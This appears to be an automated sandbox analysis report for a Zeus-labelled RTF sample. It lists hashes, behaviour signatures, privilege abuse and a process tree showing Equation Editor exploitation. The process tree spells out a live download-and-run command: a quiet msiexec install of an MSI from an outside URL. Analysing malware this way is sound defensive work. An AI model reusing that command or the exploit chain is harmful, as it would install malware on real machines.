Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12-12-2024 06:03
Static task
static1
Behavioral task
behavioral1
Sample
e507b370764f67144cc781a69981e965_JaffaCakes118.rtf
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e507b370764f67144cc781a69981e965_JaffaCakes118.rtf
Resource
win10v2004-20241007-en
General
-
Target
e507b370764f67144cc781a69981e965_JaffaCakes118.rtf
-
Size
261KB
-
MD5
e507b370764f67144cc781a69981e965
-
SHA1
b547b4f7c269a8f7d6b8df59b7eb035faaf68236
-
SHA256
33456b620018dd5f68a6a536804f3da03e87eaf66c356f2b4f8d4d82ddc8866a
-
SHA512
a15f0b024a8abd5c140d22c711befe5fd3f8f6b92bbcf1ee56c970c4bf004289336b5865fc59a38c6fe0d92d4c08fb0a9205608905dc4fc1e8dbe8f4b2f17f2a
-
SSDEEP
768:s7Kf2sdrM3xaSybdRZXZWkWZNLeSGfmg3151tVzFkkQAyijfjBw7BVMiy2sFBYSq:sxxQW3yF3Fjy0+VMPate/ePB
Malware Config
Signatures
-
Zeus
-
Zeus family
-
Use of msiexec (install) with remote resource 1 IoCs
pid Process 1708 msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2240 msiexec.exe 6 2240 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2008 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2348 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeShutdownPrivilege 1708 msiexec.exe Token: SeIncreaseQuotaPrivilege 1708 msiexec.exe Token: SeRestorePrivilege 2240 msiexec.exe Token: SeTakeOwnershipPrivilege 2240 msiexec.exe Token: SeSecurityPrivilege 2240 msiexec.exe Token: SeCreateTokenPrivilege 1708 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1708 msiexec.exe Token: SeLockMemoryPrivilege 1708 msiexec.exe Token: SeIncreaseQuotaPrivilege 1708 msiexec.exe Token: SeMachineAccountPrivilege 1708 msiexec.exe Token: SeTcbPrivilege 1708 msiexec.exe Token: SeSecurityPrivilege 1708 msiexec.exe Token: SeTakeOwnershipPrivilege 1708 msiexec.exe Token: SeLoadDriverPrivilege 1708 msiexec.exe Token: SeSystemProfilePrivilege 1708 msiexec.exe Token: SeSystemtimePrivilege 1708 msiexec.exe Token: SeProfSingleProcessPrivilege 1708 msiexec.exe Token: SeIncBasePriorityPrivilege 1708 msiexec.exe Token: SeCreatePagefilePrivilege 1708 msiexec.exe Token: SeCreatePermanentPrivilege 1708 msiexec.exe Token: SeBackupPrivilege 1708 msiexec.exe Token: SeRestorePrivilege 1708 msiexec.exe Token: SeShutdownPrivilege 1708 msiexec.exe Token: SeDebugPrivilege 1708 msiexec.exe Token: SeAuditPrivilege 1708 msiexec.exe Token: SeSystemEnvironmentPrivilege 1708 msiexec.exe Token: SeChangeNotifyPrivilege 1708 msiexec.exe Token: SeRemoteShutdownPrivilege 1708 msiexec.exe Token: SeUndockPrivilege 1708 msiexec.exe Token: SeSyncAgentPrivilege 1708 msiexec.exe Token: SeEnableDelegationPrivilege 1708 msiexec.exe Token: SeManageVolumePrivilege 1708 msiexec.exe Token: SeImpersonatePrivilege 1708 msiexec.exe Token: SeCreateGlobalPrivilege 1708 msiexec.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2348 WINWORD.EXE 2348 WINWORD.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2008 wrote to memory of 2500 2008 EQNEDT32.EXE 31 PID 2008 wrote to memory of 2500 2008 EQNEDT32.EXE 31 PID 2008 wrote to memory of 2500 2008 EQNEDT32.EXE 31 PID 2008 wrote to memory of 2500 2008 EQNEDT32.EXE 31 PID 2500 wrote to memory of 1708 2500 cmd.exe 33 PID 2500 wrote to memory of 1708 2500 cmd.exe 33 PID 2500 wrote to memory of 1708 2500 cmd.exe 33 PID 2500 wrote to memory of 1708 2500 cmd.exe 33 PID 2500 wrote to memory of 1708 2500 cmd.exe 33 PID 2500 wrote to memory of 1708 2500 cmd.exe 33 PID 2500 wrote to memory of 1708 2500 cmd.exe 33 PID 2348 wrote to memory of 1904 2348 WINWORD.EXE 36 PID 2348 wrote to memory of 1904 2348 WINWORD.EXE 36 PID 2348 wrote to memory of 1904 2348 WINWORD.EXE 36 PID 2348 wrote to memory of 1904 2348 WINWORD.EXE 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e507b370764f67144cc781a69981e965_JaffaCakes118.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1904
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\cmd.execmd.exe & /C CD C: & msiexec.exe /i https://a.doko.moe/ldbbxq.msi /quiet2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i https://a.doko.moe/ldbbxq.msi /quiet3⤵
- Use of msiexec (install) with remote resource
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2240